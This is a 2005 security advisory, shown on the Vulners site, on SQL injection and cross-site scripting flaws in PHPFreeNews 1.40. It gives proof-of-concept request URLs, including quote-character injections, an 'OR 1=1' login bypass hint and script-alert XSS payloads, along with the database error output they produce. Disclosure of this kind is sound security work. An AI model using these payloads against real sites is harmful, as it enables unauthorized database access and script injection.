Vulners
Lucene search
phpfreenews140.txt
`PHPFreeNews V1.40 and prior Multiple Vulnerabilities
SEVERITY:
=========
High
SOFTWARE:
=========
PHPFreeNews
http://www.phpfreenews.co.uk/
INFO:
=====
PHPFreeNews is a free PHP Script which allows you to display news
headlines and articles on your website.
DESCRIPTION:
============
PHPFreeNews Version V1.40 and earlier are vulnerable to various SQL
Injection and XSS attacks. Here are some examples:
--==-- SQL Injection --==--
http://www.site.com/phpfn/SearchResults.php?Match='&NewsMode=1&SearchNews=Search&CatID=0
http://www.site.com/phpfn/SearchResults.php?Match=1&NewsMode=1&SearchNews=Search&CatID='
http://www.site.com/phpfn/SearchResults.php?Match=%27&NewsMode=1&SearchNews=Search&CatID=0
http://www.site.com/phpfn/SearchResults.php?Match=1&NewsMode=1&SearchNews=Search&CatID=%27
Warning: mysql_num_rows(): supplied argument is not a valid MySQL
result resource in \somepath\www\phpfn\Inc\ListingFunctions.php on
line 92
Query failed : You have an error in your SQL syntax. Check the manual
that corresponds to your MySQL server version for the right syntax to
use near '''' IN BOOLEAN MODE) ORDER BY Sticky DESC, Priority,
PostDate
Also http://www.site.com/phpfn/Inc/AccessControl.php type for user and
pass some sql injection string like "OR" 1=1 and you will get an
error.
--==-- XSS --==--
http://www.site.com/phpfn/NewsCategoryForm.php?NewsMode="><script>alert('Found
By Matrix_Killer');</script>&CatID=0
http://www.site.com/phpfn/SearchResults.php?Match='><script>alert('Matrix_Killer
OwnZ The World :)');</script>&NewsMode=1&SearchNews=Search&CatID=0
http://www.site.com/phpfn/SearchResults.php?Match=1&NewsMode=1&SearchNews=Search&CatID='><script>alert('Hell
Year');</script>
http://www.site.com/phpfn/SearchResults.php?Match=1&NewsMode="><script>alert('0_o
Please StoP !');</script>&SearchNews=Search&CatID=0
http://www.site.com/phpfn/SearchResults.php?Match="><script>alert('Matrix_Killer
-> The bug Hunter <-');</script>&NewsMode=1&SearchNews=Search&CatID=0
VENDOR STATUS
=============
Vendor contacted on the 17th of August.
Vendor Reply (17th of August) - All the bugs have been fixed and will
be included in the next release.
CREDITS:
========
This vulnerability was discovered and researched by -
matrix_killer of h4cky0u Security Forums.
mail : matrix_k at abv.bg
web : http://www.h4cky0u.org
Co-Researcher -
h4cky0u of the h4cky0u Security Forums.
mail : [email protected]
web : http://www.h4cky0u.org
Greets to all omega-team members + krassswr,EcLiPsE and all who support us !!!
--
http://www.h4cky0u.org
(In)Security at its best...
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
18 Aug 2005 00:00Current
7.4High risk
Vulners AI Score7.4